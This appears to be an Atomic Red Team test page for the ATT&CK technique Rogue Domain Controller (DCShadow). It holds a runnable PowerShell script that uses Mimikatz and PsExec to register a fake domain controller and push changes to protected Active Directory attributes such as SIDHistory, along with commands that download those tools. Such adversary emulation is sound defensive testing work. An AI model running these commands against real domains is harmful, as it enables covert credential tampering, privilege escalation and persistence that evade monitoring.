Skip to content

Latest commit

 

History

History
108 lines (76 loc) · 5.27 KB

T1207.md

File metadata and controls

108 lines (76 loc) · 5.27 KB

T1207 - Rogue Domain Controller

Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.

Registering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)

This technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform SID-History Injection and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)

Atomic Tests


Atomic Test #1 - DCShadow - Mimikatz

Use Mimikatz DCShadow method to simulate behavior of a Domain Controller and edit protected attribute.

DCShadow Additional Reference

It will set the badPwdCount attribute of the target user (user/machine account) to 9999. You can check after with: Get-ADObject -LDAPFilter '(samaccountname=)' -Properties badpwdcount | select-object -ExpandProperty badpwdcount

Need SYSTEM privileges locally (automatically obtained via PsExec, so running as admin is sufficient), and Domain Admin remotely. The easiest is to run elevated and as a Domain Admin user.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
object Targeted object (for machine account do not forget to add final '$') string bruce.wayne
attribute Object attribute to edit, interesting ones: badpwdcount, primaryGroupId, SIDHistory... string badpwdcount
value Value to assign to object attribute string 9999
mimikatz_path Mimikatz windows executable path $env:TEMP\mimikatz\x64\mimikatz.exe
psexec_path Path to PsExec string C:\PSTools\PsExec.exe

Attack Commands: Run with powershell! Elevation Required (e.g. root or admin)

# starting fake DC server, as SYSTEM (required)
$dc_output_file = "$env:TEMP\art-T1207-mimikatz-DC.log"
Remove-Item $dc_output_file -ErrorAction Ignore
$mimikatzParam ="`"log $dc_output_file`" `"lsadump::dcshadow /object:#{object} /attribute:#{attribute} /value:#{value}`" `"exit`""
$dc = Start-Process -FilePath cmd.exe -Verb Runas -ArgumentList "/c #{psexec_path} /accepteula -d -s #{mimikatz_path} $mimikatzParam"

# wait for fake DC server to be ready...
Start-Sleep -Seconds 5

# server ready, so trigger replication (push) and wait until it finished
& #{mimikatz_path} "lsadump::dcshadow /push" "exit"

Write-Host "`nWaiting for fake DC server to return"
Wait-Process $dc

Write-Host "`nOutput from fake DC server:"
Get-Content $dc_output_file
Start-Sleep 1 # wait a little until the file is not locked anymore so we can actually delete it
Remove-Item $dc_output_file -ErrorAction Ignore

Write-Host "End of DCShadow"

Cleanup Commands:

Stop-Process -Name "mimikatz" -Force -ErrorAction Ignore

Dependencies: Run with powershell!

Description: Mimikatz executor must exist on disk and at specified location (#{mimikatz_path})
Check Prereq Commands:
$mimikatz_path = cmd /c echo #{mimikatz_path}
if (Test-Path $mimikatz_path) {exit 0} else {exit 1} 
Get Prereq Commands:
$mimikatz_path = cmd /c echo #{mimikatz_path}
Invoke-WebRequest "https://github.com/gentilkiwi/mimikatz/releases/download/2.2.0-20200918-fix/mimikatz_trunk.zip" -OutFile "$env:TEMP\mimikatz.zip"
Expand-Archive $env:TEMP\mimikatz.zip $env:TEMP\mimikatz -Force
New-Item -ItemType Directory (Split-Path $mimikatz_path) -Force | Out-Null
Move-Item $env:TEMP\mimikatz\x64\mimikatz.exe $mimikatz_path -Force
Description: PsExec tool from Sysinternals must exist on disk at specified location (#{psexec_path})
Check Prereq Commands:
if (Test-Path "#{psexec_path}") { exit 0} else { exit 1} 
Get Prereq Commands:
Invoke-WebRequest "https://download.sysinternals.com/files/PSTools.zip" -OutFile "$env:TEMP\PsTools.zip"
Expand-Archive $env:TEMP\PsTools.zip $env:TEMP\PsTools -Force
New-Item -ItemType Directory (Split-Path "#{psexec_path}") -Force | Out-Null
Copy-Item $env:TEMP\PsTools\PsExec.exe "#{psexec_path}" -Force